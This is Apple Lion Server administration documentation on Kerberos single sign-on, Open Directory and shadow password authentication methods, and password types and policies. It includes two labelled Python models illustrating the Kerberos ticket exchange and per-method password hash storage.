Network authentication is difficult: to deploy a network authentication method, the client and server must agree on the authentication method. Although it is possible for client/server processes to agree on a custom authentication method, getting pervasive adoption across a suite of network protocols, platforms, and clients is virtually impossible. For example, suppose you want to deploy smart cards as a network authentication method. Without Kerberos, you must change every client/server protocol to support the new method. The list of protocols includes SMTP, POP, IMAP, AFP, SMB, HTTP, FTP, IPP, SSH, QuickTime Streaming, DNS, LDAP, local directory domain, RPC, NFS, AFS, WebDAV, and LPR, and goes on and on. Considering all the software that does network authentication, deploying a new authentication method across the entire suite of network protocols would be a daunting task. Although this might be feasible for software from one vendor, you'd be unlikely to get all vendors to change their client software to use your new method. Further, you'd probably also want your authentication to work on multiple platforms (such as Mac OS X Lion, Windows, and UNIX). Due to the design of Kerberos, a client/server binary protocol that supports Kerberos doesn't even know how the user proves identity. Therefore you only need to change the Kerberos client and the Kerberos server to accept a new proof of identity such as a smart card. As a result, your entire Kerberos network has now adopted the new proof-of-identity method, without deploying new versions of client and server software.

Kerberos provides a central authentication authority for the network. All Kerberos-enabled services and clients use this central authority. Administrators can centrally audit and control authentication policies and operations. Kerberos can authenticate users for the following services of a Mac server:
Login window
Mail service
AFP file service
FTP file service
SMB file service (as a member of an Active Directory Kerberos realm)
VPN service
Apache web service
LDAP directory service
iChat service
Print service
NFS file service
Xgrid service
These services have been Kerberized whether they are running or not.
Only services that are Kerberized can use Kerberos to authenticate a user. Lion Server includes command-line tools for Kerberizing other services that are compatible with MIT-based Kerberos.

Breaking the barriers to Kerberos deployment
Until recently Kerberos was a technology for universities and government sites. It wasn't more widely deployed because adoption barriers needed to be taken down. Mac OS X Lion and Mac OS X Server v10.3 or later eliminate the following historical barriers to adoption of Kerberos:
An administrator had to set up a Kerberos KDC. This was difficult to deploy and administer.
There was no standard integration with a directory system. Kerberos only does authentication. It doesn't store user account data such as user ID (UID), home folder location, or group membership. The administrator had to determine how to integrate Kerberos with a directory system.
Servers had to be registered with the Kerberos KDC. This added an extra step to the server setup process.
After setting up a Kerberos server, the administrator had to visit all client computers and configure each one to use Kerberos. This was time consuming and required editing configuration files and using command-line tools.
You needed a suite of Kerberized applications (server and client software). Some of the basics were available but porting them and adapting them to work with your environment was difficult.
Not all network protocols used for client-server authentication are Kerberos-enabled. Some network protocols still require traditional challenge-response authentication methods and there is no standard way to integrate Kerberos with these legacy network authentication methods.

The Kerberos client supports failover, so if one KDC is offline it can use a replica, but the administrator had to figure out how to set up a Kerberos replica.
Administration tools were never integrated. Tools for creating and editing user accounts in the directory domain didn't know anything about Kerberos, and the Kerberos tools knew nothing about user accounts in directories. Setting up a user record was a site-specific operation based on how the KDC was integrated with the directory system.

Single sign-on experience
Kerberos is a credential or ticket-based system. The user logs in once to the Kerberos system and is issued a ticket with a life span. During the life span of this ticket the user doesn't need to authenticate again to access a Kerberized service. The user's Kerberized client software, such as the Mail application, presents a valid Kerberos ticket to authenticate the user for a Kerberized service. This provides a single sign-on experience.

A Kerberos ticket is like a press pass to a jazz festival held at multiple nightclubs over a three-day weekend. You prove your identity once to get the pass. Until the pass expires, you can show it at any nightclub to get a ticket for a performance. All participating nightclubs accept your pass without seeing your proof of identity again.

Lion Server user management

Open Directory services

Authentication

Configure services for Kerberos after upgrading


After upgrading to Lion Server, you may need to configure some services to use single sign-on Kerberos authentication. These services either weren't configured to use Kerberos or weren't included with the earlier version of Mac OS X Server. If this condition exists, a message about it appears when you connect to the server in Server Admin. The message appears in the Overview pane when you select the server (not a service) in the Servers list.

1. Open Server Admin and connect to the upgraded server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Open Directory.
4. Click Settings, then click General.
5. Click Kerberize Services, then enter the name and password of an LDAP directory administrator account.
Services that were already configured to use Kerberos are not affected.

Lion Server user management

Open Directory services

Authentication

Kerberos principal and realm


Kerberized services are configured to authenticate principals who are known to a Kerberos realm. You can think of a realm as a Kerberos database or authentication domain that contains validation data for users, services, and sometimes servers, which are all known as principals. For example, a realm contains principals' secret keys, which are the result of a one-way function applied to passwords. Service principals are generally based on randomly generated secrets rather than passwords. Here are examples of realm and principal names. Realm names are capitalized by convention to distinguish them from DNS domain names:
Realm: MYREALM.EXAMPLE.COM
User principal: jsanchez@MYREALM.EXAMPLE.COM
Service principal: afpserver/somehost.example.com@MYREALM.EXAMPLE.COM

There are several phases to Kerberos authentication. In the first phase, the client obtains credentials to be used to request access to Kerberized services. In the second phase, the client requests authentication for a specific service. In the final phase, the client presents those credentials to the service. The following illustration summarizes these activities. The service and the client can be the same entity (such as the login window) or two entities (such as a mail client and the mail server).

Kerberos authentication process
1. The client authenticates to a Kerberos KDC, which interacts with realms to access authentication data. This is the only step in which passwords and associated password policy information are checked.
2. The KDC issues a ticket-granting ticket to the client. The ticket is the credential needed when the client wants to use Kerberized services and is good for a configurable period of time, but it can be revoked before expiration. It is cached on the client until it expires.
3. The client contacts the KDC with the ticket-granting ticket when it wants to use a Kerberized service.
4. The KDC issues a ticket for that service.
5. The client presents the ticket to the service.
6. The service authenticates the client by verifying that the ticket is valid.
After authenticating the client, the service determines if the client is authorized to use the service. Kerberos only authenticates clients; it does not authorize them to use services. For example, many services use the Mac server's service access control lists (SACLs) to determine whether a client is authorized to use the service. Kerberos never sends a password or password policy information to a service. After a ticket-granting ticket is obtained, no password information is provided.

Time is very important with Kerberos. If the client and the KDC are out of sync by more than a few minutes, the client fails to achieve authentication with the KDC. The date, time, and time zone information must be correct on the KDC server and clients, and the server and clients should all use the same network time service to keep their clocks in sync. For more information about Kerberos, go to the MIT Kerberos website at web.mit.edu/kerberos/www/index.html.
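The six steps above, together with the ticket life span described under "Single sign-on experience", can be walked through in a small model. The following is an added illustration, not Apple's or MIT's code and not the real Kerberos wire format: tickets are authenticated with HMAC-SHA256 under the issuing principal's key rather than encrypted, principal keys come from a one-way function of a secret, and every name, secret and clock value is constructed (the realm and principal names reuse the examples from this section). What the model preserves is what the page states: the password is checked only in step 1, the service never sees it, tickets expire, and a client clock more than a few minutes off the KDC's is refused.

```python
"""Toy model of the six-step Kerberos exchange: KDC, client and Kerberized service.

Added illustration, not Apple's or MIT's code and not the real protocol
format. Tickets are HMAC-authenticated rather than encrypted; every name,
secret and clock value is constructed.
"""
import hashlib
import hmac
import json
import time

REALM = "MYREALM.EXAMPLE.COM"
MAX_SKEW = 300            # seconds of client/KDC clock difference tolerated
TGT_LIFETIME = 10 * 3600  # ticket-granting ticket life span, seconds
SERVICE_LIFETIME = 3600   # service ticket life span, seconds


def principal_key(secret: str) -> bytes:
    """One-way function from a password or service secret to a principal key."""
    return hashlib.sha256(secret.encode()).digest()


def seal(key: bytes, claims: dict) -> dict:
    """Issue a ticket whose claims can be verified only by a holder of `key`."""
    body = json.dumps(claims, sort_keys=True)
    return {"body": body, "tag": hmac.new(key, body.encode(), hashlib.sha256).hexdigest()}


def unseal(key: bytes, ticket: dict, now: float) -> dict:
    """Verify a ticket's tag and life span; return its claims."""
    tag = hmac.new(key, ticket["body"].encode(), hashlib.sha256).hexdigest()
    if not hmac.compare_digest(tag, ticket["tag"]):
        raise PermissionError("ticket was not issued under this key")
    claims = json.loads(ticket["body"])
    if claims["expires"] < now:
        raise PermissionError("ticket has expired")
    return claims


class KDC:
    """Holds the realm's principal keys and issues tickets (steps 1 to 4)."""

    def __init__(self, users: dict, services: dict, clock=time.time):
        self.keys = {f"{u}@{REALM}": principal_key(pw) for u, pw in users.items()}
        self.keys.update({f"{s}@{REALM}": principal_key(sec) for s, sec in services.items()})
        self.tgs_key = principal_key("constructed-krbtgt-secret")  # seals TGTs
        self.clock = clock

    def authenticate(self, user: str, password: str, client_time: float) -> dict:
        """Steps 1 and 2: the only point at which the password is checked."""
        now = self.clock()
        if abs(client_time - now) > MAX_SKEW:
            raise PermissionError("client clock out of sync with the KDC")
        key = self.keys.get(f"{user}@{REALM}")
        if key is None or not hmac.compare_digest(key, principal_key(password)):
            raise PermissionError("authentication failed")
        return seal(self.tgs_key, {"user": f"{user}@{REALM}", "expires": now + TGT_LIFETIME})

    def service_ticket(self, tgt: dict, service: str) -> dict:
        """Steps 3 and 4: exchange a valid TGT for a ticket sealed under the service's key."""
        now = self.clock()
        claims = unseal(self.tgs_key, tgt, now)
        principal = f"{service}@{REALM}"
        return seal(self.keys[principal], {"user": claims["user"], "service": principal,
                                           "expires": now + SERVICE_LIFETIME})


class KerberizedService:
    """Accepts tickets sealed under its own key (steps 5 and 6); no password involved."""

    def __init__(self, name: str, secret: str, clock=time.time):
        self.principal = f"{name}@{REALM}"
        self.key = principal_key(secret)
        self.clock = clock

    def accept(self, ticket: dict) -> str:
        claims = unseal(self.key, ticket, self.clock())
        if claims["service"] != self.principal:
            raise PermissionError("ticket was issued for a different service")
        return claims["user"]   # authenticated; authorization (for example SACLs) is separate


def run_exchange(client_skew: float = 0.0) -> str:
    """Drive all six steps with constructed principals; return the authenticated user."""
    frozen = 1_700_000_000.0          # constructed KDC clock value
    clock = lambda: frozen
    service_name = "afpserver/somehost.example.com"
    kdc = KDC(users={"jsanchez": "constructed-user-password"},
              services={service_name: "constructed-service-secret"}, clock=clock)
    afp = KerberizedService(service_name, "constructed-service-secret", clock=clock)
    tgt = kdc.authenticate("jsanchez", "constructed-user-password", frozen + client_skew)
    ticket = kdc.service_ticket(tgt, service_name)
    return afp.accept(ticket)


if __name__ == "__main__":
    print(run_exchange())   # jsanchez@MYREALM.EXAMPLE.COM
```

Calling `run_exchange(client_skew=600)` reproduces the clock-skew failure the text warns about: the KDC refuses step 1 before any ticket is issued, which is why KDC and clients should share a network time service.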

Lion Server user management
Open Directory services
Authentication

About Open Directory password server and shadow password authentication methods
For compatibility with various services, Lion Server can use several authentication methods to validate Open Directory passwords and shadow passwords. For Open Directory passwords, Lion Server uses the standard Simple Authentication and Security Layer (SASL) mechanism to negotiate an authentication method between a client and a service. For shadow passwords, the use of SASL depends on the network protocol. The following authentication methods are supported:
Method              Network security                      Storage security   Uses
APOP                Encrypted, with clear text fallback   Clear text         POP mail service
CRAM-MD5            Encrypted, with clear text fallback   Encrypted          IMAP mail service, LDAP service
DHX                 Encrypted                             Encrypted          AFP file service, Open Directory administration
Digest-MD5          Encrypted                             Encrypted          Login window, mail service
MS-CHAPv2           Encrypted                             Encrypted          VPN service
NTLMv1 and NTLMv2   Encrypted                             Encrypted          SMB services (Windows NT/98 or later)
WebDAV-Digest       Encrypted                             Clear text         WebDAV file service (iDisk)

Open Directory supports many authentication methods because each service that requires authentication uses some methods but not others. For example, AFP service uses one set of authentication methods, web services use another set of methods, mail service uses another set, and so on.

Some authentication methods are more secure than others. The more secure methods use stronger algorithms to encode the information they transmit between client and server. The more secure authentication methods also store hashes, which can't easily be recovered from the server. Less secure methods store a recoverable, clear-text password. Open Directory does not provide a mechanism for reading or retrieving a user's existing password, but an administrator can use Workgroup Manager to set a user's password.

If you connect Mac OS X Server v10.4 or later to a directory domain of Mac OS X Server v10.3 or earlier, users defined in the older directory domain cannot be authenticated with the NTLMv2 method. This method may be required to securely authenticate some Windows users for the Windows services of Mac OS X Server v10.4 or later. Open Directory Password Server in Mac OS X Server v10.4 or later supports NTLMv2 authentication, but Password Server in Mac OS X Server v10.3 or earlier does not support NTLMv2.

If you connect Mac OS X Server v10.3 or later to a directory domain of Mac OS X Server v10.2 or earlier, users defined in the older directory domain cannot be authenticated with the MS-CHAPv2 method. This method may be required to securely authenticate users for the VPN service of Mac OS X Server v10.3 or later. Open Directory Password Server in Mac OS X Server v10.3 or later supports MS-CHAPv2 authentication, but Password Server in Mac OS X Server v10.2 does not support MS-CHAPv2.

Disable Open Directory authentication methods

To make Open Directory password storage on the server more secure, you can selectively disable authentication methods.
For example, if no clients are going to use Windows services, you can disable the NTLMv1, NTLMv2, and LAN Manager authentication methods to prevent storing passwords on the server using these methods. Then someone who gains unauthorized access to the server's password database can't exploit weaknesses in these authentication methods to crack passwords. The LAN Manager hash is the weakest of these: it is case-insensitive and covers only the first 14 characters of the password, so it is cracked quickly once obtained.

Important: If you disable an authentication method, its hash is removed from the password database the next time the user authenticates. If you enable an authentication method that was disabled, every Open Directory password must be reset to add the newly enabled method's hash to the password database. Users can reset their own passwords, or a directory administrator can do it.

Disabling an authentication method makes the Open Directory Password Server database more secure if an unauthorized user gains physical access to an Open Directory server (master or replica) or to media containing a backup of the Open Directory master. Someone who gains access to the password database can try to crack a user's password by attacking the hash or recoverable text stored in the password database by any authentication method. Nothing is stored in the password database by a disabled authentication method, leaving one less avenue of attack open to a cracker who has physical access to the Open Directory server or a backup of it.

Some hashes stored in the password database are easier to crack than others. Recoverable authentication methods store clear (plainly readable) text. Disabling authentication methods that store clear text or weaker hashes increases password database security more than disabling methods that store stronger hashes. If you believe your Open Directory master, replicas, and backups are secure, select all authentication methods. If you're concerned about the physical security of any Open Directory server or its backup media, disable some methods.
Note: Disabling authentication methods does not increase the security of passwords while they are transmitted over the network. Only password database security is affected. In fact, disabling some authentication methods might require clients to configure their software to send passwords over the network in clear text, thereby compromising password security in a different way.

Disable shadow password authentication methods

You can selectively disable authentication methods to make passwords stored in shadow password files more secure. For example, if a user doesn't use mail service or web services, you can disable the WebDAV-Digest and APOP methods for the user. Then someone who gains access to the shadow password files on a server can't recover the user's password.

Important: If you disable a shadow password authentication method, its hash is removed from a user's shadow password file the next time the user authenticates. If you enable an authentication method that was disabled, the newly enabled method's hash is added to the user's shadow password file the next time the user authenticates for a service that can use a clear-text password, such as a login window or AFP. Alternatively, you can reset the user's password to add the newly enabled method's hash. The user can reset the password, or a directory administrator can do it.

Disabling an authentication method makes the shadow password more secure if a malicious user gains physical access to a server's shadow password files or to media containing a backup of the shadow password files. Someone who gains access to the password files can try to crack a user's password by attacking the hash or recoverable text stored by any authentication method. Nothing is stored by a disabled authentication method, leaving one less avenue of attack open to a cracker who has physical access to a server's shadow password files or a backup of them.

Hashes stored by some authentication methods are easier to crack than others. With recoverable authentication methods, original clear-text passwords can be reconstructed from what is stored in the file. Disabling the authentication methods that store recoverable or weaker hashes increases shadow password file security more than disabling methods that store stronger hashes. If you believe a server's shadow password files and backups are secure, select all authentication methods. If you're concerned about the physical security of the server or its backup media, disable unused methods.

Note: Disabling authentication methods does not increase the security of passwords while they are transmitted over the network. Only password storage security is affected. Disabling some authentication methods might require clients to configure their software to send passwords over the network in clear text, thereby compromising password security in a different way.
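To make the storage-security column of the table and the disable/enable behaviour above concrete, here is an added Python model (not Apple's Password Server code) of what one user's record must hold for each enabled method: APOP and WebDAV-Digest need the password itself, CRAM-MD5 can keep precomputed HMAC-MD5 inner/outer hash states, and Digest-MD5 keeps HA1 = MD5(user:realm:password). Disabling the recoverable methods leaves only hashes, and once they are gone the record cannot be repopulated without a password reset. The user name, realm, and passwords are constructed, and the Digest-MD5 response is the simplified RFC 2069 form without qop/cnonce.

```python
import hashlib
import hmac

# Added model of what the Password Server keeps per enabled method, written for this page
# (not Apple's implementation). APOP and WebDAV-Digest must keep the password itself;
# CRAM-MD5 keeps the keyed-MD5 inner/outer states; Digest-MD5 keeps HA1 = MD5(user:realm:pw).
# The Digest-MD5 response below is the simplified (RFC 2069-style) form, without qop/cnonce.
RECOVERABLE = {"APOP", "WEBDAV-DIGEST"}

def cram_md5_context(password: str) -> tuple:
    """Precomputed HMAC-MD5 inner and outer hash states; verifies CRAM-MD5 without the password."""
    key = password.encode()
    if len(key) > 64:                       # HMAC: keys longer than the block size are hashed first
        key = hashlib.md5(key).digest()
    key = key.ljust(64, b"\0")
    inner = hashlib.md5(bytes(b ^ 0x36 for b in key))
    outer = hashlib.md5(bytes(b ^ 0x5C for b in key))
    return inner, outer

def cram_md5_from_context(ctx: tuple, challenge: bytes) -> str:
    inner, outer = ctx[0].copy(), ctx[1].copy()
    inner.update(challenge)
    outer.update(inner.digest())
    return outer.hexdigest()

def digest_ha1(user: str, realm: str, password: str) -> str:
    return hashlib.md5(f"{user}:{realm}:{password}".encode()).hexdigest()

def digest_response(ha1: str, nonce: str, method: str, uri: str) -> str:
    ha2 = hashlib.md5(f"{method}:{uri}".encode()).hexdigest()
    return hashlib.md5(f"{ha1}:{nonce}:{ha2}".encode()).hexdigest()

class PasswordRecord:
    """One user's entry: a slot per enabled method, holding only what that method needs to verify."""
    def __init__(self, user: str, realm: str, password: str, enabled: set):
        self.user, self.realm, self.slots = user, realm, {}
        self.reset_password(password, enabled)

    def reset_password(self, password: str, enabled: set) -> None:
        """Only a password reset can (re)populate slots: a stored hash cannot yield the password."""
        self.slots = {}
        for m in set(enabled) & RECOVERABLE:
            self.slots[m] = password                       # clear text, by necessity
        if "CRAM-MD5" in enabled:
            self.slots["CRAM-MD5"] = cram_md5_context(password)
        if "DIGEST-MD5" in enabled:
            self.slots["DIGEST-MD5"] = digest_ha1(self.user, self.realm, password)

    def disable(self, method: str) -> None:
        self.slots.pop(method, None)       # the guide: dropped at the user's next authentication

    def stores_clear_text(self) -> bool:
        return any(m in self.slots for m in RECOVERABLE)

    def verify(self, method: str, challenge: str, response: str, uri: str = "/") -> bool:
        if method not in self.slots:
            return False                   # disabled (or never enabled): nothing to check against
        if method == "APOP":
            expected = hashlib.md5((challenge + self.slots[method]).encode()).hexdigest()
        elif method == "CRAM-MD5":
            expected = cram_md5_from_context(self.slots[method], challenge.encode())
        elif method == "DIGEST-MD5":
            expected = digest_response(self.slots[method], challenge, "AUTHENTICATE", uri)
        else:
            raise NotImplementedError(method)
        return hmac.compare_digest(expected, response)

# Client side: what each protocol's client computes from the real password.
def apop_client(challenge: str, password: str) -> str:
    return hashlib.md5((challenge + password).encode()).hexdigest()

def cram_md5_client(challenge: str, password: str) -> str:
    return hmac.new(password.encode(), challenge.encode(), "md5").hexdigest()

def digest_md5_client(user: str, realm: str, password: str, nonce: str, uri: str = "/") -> str:
    return digest_response(digest_ha1(user, realm, password), nonce, "AUTHENTICATE", uri)

if __name__ == "__main__":
    rec = PasswordRecord("jsanchez", "MYREALM.EXAMPLE.COM", "correct horse battery staple",
                         {"APOP", "WEBDAV-DIGEST", "CRAM-MD5", "DIGEST-MD5"})
    print("clear text in record:", rec.stores_clear_text())   # True: APOP/WebDAV-Digest need it
    rec.disable("APOP")
    rec.disable("WEBDAV-DIGEST")
    print("clear text in record:", rec.stores_clear_text())   # False: only hashes and HMAC states remain
```

The record still verifies CRAM-MD5 and Digest-MD5 responses after the recoverable slots are gone, but an APOP attempt now fails rather than falling back, which is the client-side consequence the Note above warns about.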
Contents of the Open Directory password server database

Open Directory Password Server maintains an authentication database separate from the directory domain. Open Directory tightly restricts access to the authentication database. Open Directory Password Server stores the following information in its authentication database for each user account that has a password type of Open Directory:

The user's password ID, a 128-bit value assigned when the password is created. It is also stored in the user's record in the directory domain and is used as a key for finding a user's record in the Open Directory Password Server database.
The password, stored in recoverable (clear text) or hashed (encrypted) forms. The form depends on the authentication method. A recoverable password is stored for the APOP and WebDAV authentication methods. For all other methods, the record stores a hashed (encrypted) password. If no authentication method requiring a clear-text password is enabled, the Open Directory authentication database stores only hashes of passwords.
The user's short name, for use in log messages viewable in Server Admin.
Password policy data.
Time stamps and other usage information, such as last login time, last failed validation time, count of failed validations, and replication information.

LDAP bind authentication

For user accounts that reside in an LDAP directory on a non-Apple server, Open Directory attempts to use LDAP bind authentication. Open Directory sends the LDAP directory server the name and password supplied by the authenticating user. If the LDAP server finds a matching user record and password, authentication succeeds.

If the LDAP directory service and the client computer's connection to it are configured to send clear text passwords over the network, LDAP bind authentication can be insecure. Open Directory tries to use a secure authentication method with the LDAP directory. If the directory doesn't support secure LDAP bind and the client's LDAPv3 connection permits sending a clear-text password, Open Directory reverts to simple LDAP bind. To prevent clear-text authentication, make sure your LDAP servers don't accept clear-text passwords. If simple LDAP bind must be used, secure it by setting up access to the LDAP directory through the Secure Sockets Layer (SSL) protocol. SSL makes access secure by encrypting all communications with the LDAP directory. For more information, see Change the security policy for an LDAP connection and Change the connection settings for an LDAP or Open Directory server.


Select authentication methods for Open Directory passwords


Using Server Admin, you can select authentication methods for user accounts whose password type is Open Directory. The Open Directory Password Server supports available authentication methods for compatibility with client software. If users never use client software that requires a specific authentication method, disable the method. For more information, see About Open Directory password server and shadow password authentication methods.

If you disable an authentication method, its hash is removed from the password database the next time the user authenticates. If you enable an authentication method that was disabled, you must reset every Open Directory password to add the enabled method's hash to the password database. The user can reset the password, or a directory administrator can do it.

To enable or disable authentication methods for user accounts whose password type is Shadow Password, see Select authentication methods for shadow password users.

1. Open Server Admin and connect to an Open Directory master server.
2. Click the triangle at the left of the server. The list of services appears.
3. From the expanded Servers list, select Open Directory.
4. Click Settings, then click Policies.
5. Click Authentication, select the authentication methods you want enabled, and deselect the authentication methods you want disabled.
6. Click Save.

Replicas of the Open Directory master inherit the authentication method settings for Open Directory passwords in the LDAP directory.

You can also use pwpolicy to enable and disable authentication methods for a user with an Open Directory password. For more information about pwpolicy, see its man page.


Select authentication methods for shadow password users


Using Workgroup Manager, you can select authentication methods for a user account whose password type is Shadow Password. A shadow password supports available authentication methods for compatibility with client software. If you know the user will never use client software that requires an authentication method, disable the method. For more information, see About Open Directory password server and shadow password authentication methods.

If you disable an authentication method, its hash is removed from the user's shadow password file the next time the user authenticates. If you enable an authentication method that was disabled, the enabled method's hash is added to the user's shadow password file the next time the user authenticates for a service that can use a clear-text password, such as a login window or AFP. Alternatively, the user's password can be reset to add the newly enabled method's hash. The user can reset the password, or a directory administrator can do it.

To enable or disable authentication methods for user accounts whose password type is Open Directory, see Select authentication methods for Open Directory passwords.

1. In Workgroup Manager, open the account you want to work with (if it is not open). To open an account, click the Accounts button, then click the Users button. Click the small globe icon above the list of users and choose from the pop-up menu to open the local directory domain where the user's account resides. Click the lock and authenticate as a directory domain administrator, then select the user in the list.
2. Click Advanced, then click Security. You can click Security only if the password type is Shadow Password.
3. Select the authentication methods you want enabled, deselect the authentication methods you want disabled, then click OK.
4. Click Save.

You can also use pwpolicy to enable and disable authentication methods for a user with a shadow password. For more information about pwpolicy, see its man page.

Lion Server user management
Open Directory services
Manage user authentication

Change a user's password


You can use Workgroup Manager to change the password of a user account defined in any directory domain you have read/write access to. For example, you can change the password of a user account in the LDAP directory of an Open Directory master.

Important: If you change the password of a user account that's used to authenticate a computer's LDAP directory connection, you must make the same change to the affected computer's LDAP connection settings or configure the LDAP directory and all connections to it to use trusted binding. For more information, see Change the password used for authenticating an LDAP connection, Set a binding policy for an Open Directory server, and Stop trusted binding with an LDAP directory.

1. Open Workgroup Manager (located in /Applications/Server/), click the Accounts button, and then click the User button.
2. Open the directory domain that contains the user account whose password you want to change, and authenticate as an administrator of the domain. To open a directory domain, click the small globe icon above the list of users and choose from the pop-up menu. If the user's password type is Open Directory, you must authenticate as an administrator whose password type is Open Directory.
3. Select the account whose password needs to be changed.
4. Enter a password in the Basic pane, then click Save.
5. Tell the user the new password so he or she can log in. After the user logs in to a Mac with the new password, the user can change the password by clicking Accounts in System Preferences.

If you change the password of an account whose password type is Open Directory and the account resides in the LDAP directory of an Open Directory replica or master, the change is synchronized with the master and its replicas. The Mac server synchronizes changes to Open Directory passwords among a master and its replicas.


Assign a temporary password to multiple users


You can use Workgroup Manager to simultaneously select multiple user accounts and change them to have the same password type and the same temporary password.

1. Open Workgroup Manager (located in /Applications/Server/), click the Accounts button, and then click the User button.
2. Open the directory domain that contains the user accounts whose password types and passwords you want to reset, and authenticate as an administrator of the domain. To open a directory domain, click the small globe icon above the list of users and choose from the pop-up menu. To set the password type to Open Directory, you must authenticate as an administrator whose password type is Open Directory.
3. Command-click or Shift-click user accounts to select the accounts whose password type must be changed.
4. Enter a password in the Basic pane, then set the User Password Type option in the Advanced pane.
5. Click Save.
6. Tell the users the temporary password so they can log in. After logging in with the temporary password, users can change the password by clicking Accounts in System Preferences.

If you change the password of accounts whose password type is Open Directory and the accounts reside in the LDAP directory of an Open Directory replica or master, the change is synchronized with the master and its replicas. A Mac server synchronizes changes to Open Directory passwords among a master and its replicas.


Composing a Password
The password associated with a user's account must be entered by the user when he or she authenticates for login or other services. The password is case sensitive (except for SMB-LAN Manager passwords) and is masked on the screen as it is entered.

Regardless of the password type you choose for a user, here are guidelines for composing a password for Lion Server user accounts:

A password should contain letters, numbers, and symbols in combinations that won't be easily guessed by unauthorized users. Passwords should not consist of words. Good passwords include digits and symbols (such as # or $), or they consist of the first letter of all words in a phrase.
Use both uppercase and lowercase letters.
Avoid spaces and Option-key combinations.
Avoid characters that can't be entered on computers the user will use or that might require knowing a special keystroke combination to enter correctly on different keyboards and platforms.
Some network protocols do not support passwords that contain leading spaces, embedded spaces, or trailing spaces.
A zero-length password is not recommended. Open Directory and some systems (such as LDAP bind) do not support a zero-length password.
For maximum compatibility with computers and services your users might access, use only ASCII characters for passwords.

Password Types

You can set password types for users in the Advanced pane of Workgroup Manager. You can choose any of the following password types:

Open Directory: Enables multiple legacy authentication methods and also enables single sign-on Kerberos authentication if the user's account is in the LDAP directory of an Open Directory master or replica. Open Directory passwords are stored separately from the directory domain in the Open Directory Password Server database and the Kerberos KDC.
Shadow password: Enables multiple legacy authentication methods for user accounts in the local directory domain. Shadow passwords are stored separately from the directory domain in files readable only by the root user account.
Crypt password: Provides basic authentication for a user account in a shared directory domain. A crypt password is stored in the user account record in the directory domain. A crypt password is required to log in to Mac OS X v10.1 or earlier.

For more information about password types, see About password types.


Change the password type to Open Directory


Using Workgroup Manager, you can specify that a user account have an Open Directory password stored in secure databases apart from the directory domain. User accounts in the following directory domains can have Open Directory passwords:

LDAP directory domain on Mac OS X Server v10.3 through v10.6 and Lion Server
Local directory domain of Mac OS X Server v10.3 or a server upgraded from v10.3
Directory domain on Mac OS X Server v10.2 that is configured to use a Password Server

The Open Directory password type supports single sign-on using Kerberos authentication. It also supports the Open Directory Password Server, which offers Simple Authentication and Security Layer (SASL) authentication protocols, including APOP, CRAM-MD5, DHX, Digest-MD5, MS-CHAPv2, NTLMv2, NTLM (also referred to as Windows NT or SMB-NT), and WebDAV-Digest.

Note: To set a user account's password type to Open Directory, you must have administrator rights for Open Directory authentication in the directory domain that contains the user account. This means you must authenticate as a directory domain administrator whose password type is Open Directory. For more information, see Assign administrator rights for Open Directory authentication.

1. Make sure the user's account resides in a directory domain that supports Open Directory authentication. The directory domains that support Open Directory authentication are listed earlier in this topic.
2. In Workgroup Manager (located in /Applications/Server/), open the account to work with (if it is not open). To open an account, click the Accounts button, then click the Users button. Click the small globe icon above the list of users and choose from the pop-up menu to open the directory domain where the user's account resides. Click the lock and authenticate as a directory domain administrator whose password type is Open Directory, then select the user in the list.
3. Click Advanced.
4. From the User Password Type pop-up menu, choose Open Directory.
5. When prompted, enter and verify a new password, then click OK. The password must contain no more than 512 bytes (512 characters or fewer, depending on the language), although the network authentication protocol can impose different limits (for example, 128 characters for NTLMv2 and NTLM). For guidelines on choosing passwords, see Composing a Password.
6. In the Advanced pane, click Options to set up the user's password policy, and click OK after you finish specifying options. If you select Disable login: on specific date, use the up and down arrows to set the date. If you select an option that requires resetting (changing) the password, remember that not all protocols support changing passwords. For example, users can't change their passwords when authenticating for IMAP mail service. The password ID is a unique 128-bit number assigned when the password is created in the Open Directory Password Server database. It can be helpful for troubleshooting, because it appears in the Password Server log when a problem occurs. For more information, see View Open Directory status and logs.
7. Click Save.


Change the password type to shadow password


Using Workgroup Manager, you can specify that a user have a shadow password stored in a secure file apart from the directory domain. Only users whose accounts reside in the local directory domain can have a shadow password.

1. In Workgroup Manager (located in /Applications/Server/), open the account to work with (if it is not open). To open an account, click the Accounts button, then click the Users button. Click the small globe icon above the list of users and choose from the pop-up menu to open the local directory domain where the user's account resides. Click the lock and authenticate as a directory domain administrator, then select the user in the list.
2. Click Advanced.
3. From the User Password Type pop-up menu, choose Shadow Password.
4. When prompted, enter and verify a password, then click OK. A long password is truncated for some authentication methods. Up to 128 characters of the password are used for NTLMv2 and NTLM, and the first 14 characters are used for LAN Manager. For guidelines on choosing passwords, see Composing a Password.
5. In the Advanced pane, click Options to set up the user's password policy, then click OK after you finish specifying options. If you select Disable login: on specific date, use the up and down arrows to set the date. If you use a policy that requires user password changing, remember that not all protocols support changing passwords. For example, users can't change their passwords when authenticating for IMAP mail service.
6. In the Advanced pane, click Security to enable or disable authentication methods for the user, then click OK after you finish. For more information, see Set password policies for users.
7. Click Save.


Use pwpolicy to change password policies


You can use pwpolicy to change password policies globally from the command line.

To change the global password policy:

$ pwpolicy -a authenticator -setglobalpolicy "option=value..."

For example, to require that all users' passwords be at least 12 characters long and to allow no more than 3 failed login attempts, enter the following in a Terminal window, where authenticator is the name of an administrator with Open Directory authentication rights:

$ pwpolicy -a authenticator -setglobalpolicy "minChars=12 maxFailedLoginAttempts=3"

For more information about pwpolicy, see its man page.


Set password policies for users


Using Workgroup Manager, you can set password policies for user accounts whose password type is Open Directory or Shadow Password. The password policy for a user overrides the global password policy defined in the Authentication Settings pane of Open Directory service in Server Admin.

The password policy for a mobile user account applies when the account is used while the mobile computer is disconnected from the network. The password policy from the corresponding network user account applies while the mobile computer is connected to the network.

Administrator accounts are exempt from password policies.

To set a password policy for a user account that has an Open Directory password, you must have administrator rights for Open Directory authentication in the directory domain that contains the user account. This means you must authenticate as a directory domain administrator whose password type is Open Directory. For more information, see Assign administrator rights for Open Directory authentication.

Kerberos and Open Directory Password Server maintain password policies separately. A Mac server synchronizes Kerberos password policy rules with Open Directory Password Server password policy rules.

Do not use the Options button in the Advanced pane to set up password policies for directory domain administrators. Password policies are not enforced for administrator accounts. Directory domain administrators must be able to change the password policies of user accounts.

1. In Workgroup Manager, open the account to work with (if it is not open). To open an account, click the Accounts button, then click the Users button. Click the small globe icon above the list of users and choose from the pop-up menu to open the directory domain where the user's account resides. Click the lock and authenticate as a directory domain administrator whose password type is Open Directory, then select the user in the list.
